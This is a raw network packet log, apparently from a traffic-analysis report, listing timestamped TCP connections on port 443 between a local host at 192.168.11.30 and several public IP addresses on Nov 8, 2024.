                                                                                                                          Nov 8, 2024 10:58:21.069519997 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.069530964 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.069761992 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.069766045 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.070216894 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.070235014 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.070473909 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.070473909 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.070480108 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.070650101 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.304378033 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.304481030 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.304781914 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.304781914 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.304791927 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.304969072 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.305157900 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.305157900 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.305167913 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.305741072 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.305847883 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.305954933 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.305964947 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.306128025 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.306667089 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.306696892 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.307043076 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.307043076 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.307049990 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.357408047 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.540864944 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.541085958 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.541095018 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.541321993 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.541331053 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.541455984 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.541802883 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.541802883 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.541814089 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.542216063 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.542277098 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.542522907 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.542531967 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.543195963 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.543313026 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.543570042 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.543570042 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.543576956 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.544347048 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.544393063 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.544521093 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.544678926 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.544678926 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.544683933 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.544938087 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.545032024 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.545037985 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.545273066 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.778820992 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779006004 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779052973 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779246092 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.779246092 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.779259920 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779624939 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.779660940 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779695034 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.779793978 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.780476093 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:23.815840006 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:23.815869093 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:23.816051006 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:23.820106030 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:23.820113897 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.030034065 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.030394077 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:24.033049107 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:24.033060074 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.033289909 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.038358927 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:24.079976082 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.862302065 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.862438917 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.862461090 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.862628937 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.862638950 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:24.862648964 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:24.863024950 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.113177061 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.113214016 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.113245964 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.113293886 CET44349738172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.113528013 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.113713980 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.138915062 CET49738443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.301091909 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.301119089 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.301312923 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.301677942 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.301685095 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.512494087 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.513705015 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.513725996 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:25.513948917 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:25.513957024 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:26.365041018 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:26.365087032 CET44349739172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:26.365329981 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:26.365787029 CET49739443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:29.310534954 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.310559988 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.310707092 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.310723066 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.310729027 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.310884953 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.311280012 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.311286926 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.311523914 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.311532974 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.521995068 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.522593975 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.522603035 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.523310900 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.523490906 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.523893118 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.524873018 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.524882078 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.525851965 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.526012897 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.527798891 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.527858019 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.528245926 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.528254986 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.530303001 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.530332088 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.530371904 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.581094980 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.581124067 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.581135035 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.627892971 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.765084028 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.765192986 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.765410900 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.765542030 CET49744443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.765549898 CET44349744172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.766618013 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.766673088 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:29.766855001 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.767101049 CET49743443192.168.11.30172.64.41.3
                                                                                                                          Nov 8, 2024 10:58:29.767107964 CET44349743172.64.41.3192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.644253016 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.644387007 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.645572901 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.646009922 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.646019936 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.977937937 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.979656935 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.979666948 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.980396986 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:35.980914116 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.984179974 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.984275103 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:35.984282017 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:36.031964064 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:36.035777092 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:36.035877943 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:36.082628012 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:36.100331068 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:36.100332022 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:36.101751089 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:36.102101088 CET49745443192.168.11.3023.41.168.139
                                                                                                                          Nov 8, 2024 10:58:36.102581978 CET4434974523.41.168.139192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:37.462891102 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:37.463207006 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:37.464554071 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:37.464736938 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:37.464745998 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:37.696625948 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:37.698993921 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:37.700160980 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:37.701368093 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:37.701375961 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.516664982 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.516665936 CET44349746172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.517824888 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.518212080 CET49746443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.571928024 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.571974993 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.572288990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.572669983 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.572678089 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.791774988 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:38.792934895 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:38.792947054 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.626683950 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.626739979 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.626773119 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.626813889 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.627159119 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.627172947 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.675620079 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.861012936 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.861072063 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.861140013 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.861421108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.861430883 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.861618996 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.861917019 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.862045050 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.862061977 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.862252951 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.862262011 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:39.862442970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:39.909810066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.103996038 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104043961 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104059935 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104116917 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104295015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.104306936 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104697943 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.104768991 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104832888 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.104878902 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.105087042 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.105233908 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.105243921 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.105418921 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.105798006 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.358411074 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358484983 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358515024 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358526945 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358560085 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358613014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358808994 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.358978033 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.358989954 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.359143019 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.359378099 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.359744072 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.589823961 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.590042114 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.590135098 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.590145111 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.590320110 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.590320110 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.590852976 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.591063976 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.591236115 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.591243982 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.591413021 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.591599941 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.591706038 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.591845036 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.592032909 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.592041016 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.592195034 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.592381954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.592715979 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.592916012 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.593009949 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.593015909 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.593197107 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.593388081 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.593434095 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.593709946 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.832395077 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.832545042 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.832792997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.832792997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.832803965 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.833172083 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.833964109 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.834161043 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.834321022 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.834441900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.834450006 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.834629059 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.834820986 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837141037 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837228060 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837343931 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837436914 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837443113 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837624073 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837624073 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837656021 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837816954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837816954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.837825060 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837829113 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:40.837866068 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:40.838247061 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.075093985 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.075258017 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.075505018 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.075515032 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.075692892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.075884104 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.076049089 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.076292038 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.076308966 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.076575994 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.076575994 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.077086926 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.077263117 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.077514887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.077522993 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.077702999 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.077893972 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.078105927 CET44349747172.67.137.62192.168.11.30
